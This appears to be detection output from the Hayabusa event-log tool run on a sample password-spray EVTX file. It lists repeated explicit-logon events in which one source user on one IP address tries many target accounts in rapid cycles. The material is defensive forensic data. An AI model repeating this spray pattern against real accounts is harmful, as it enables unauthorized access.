DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:17.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:19.035 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:20.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:21.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:22.222 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:23.295 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:24.342 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:25.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:26.504 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:27.583 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:28.654 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:29.712 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:30.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:31.861 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:32.955 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:34.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:35.081 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:36.151 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:37.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:38.310 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:39.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:40.457 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:41.553 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:42.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:43.686 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:44.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:45.818 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:46.896 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:47.953 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:49.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:50.082 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:51.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:52.214 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:53.285 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:54.354 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:55.438 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:56.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:57.578 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:58.661 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:59.721 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:00.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:01.865 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:02.941 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:04.015 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:05.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:06.182 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:07.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:08.315 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:09.399 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:10.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:11.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:12.621 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:13.709 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:14.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:15.849 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:16.918 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:17.999 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:19.068 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:20.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:21.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:22.250 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:23.338 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:24.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:25.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:26.529 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:27.607 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:28.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:29.753 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:30.838 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:31.910 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:32.983 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:34.067 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:35.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:36.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:37.334 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:38.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:39.463 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:40.530 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:41.608 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:42.669 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:43.731 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:44.801 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:45.880 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:46.969 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:48.042 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:49.108 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:50.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: 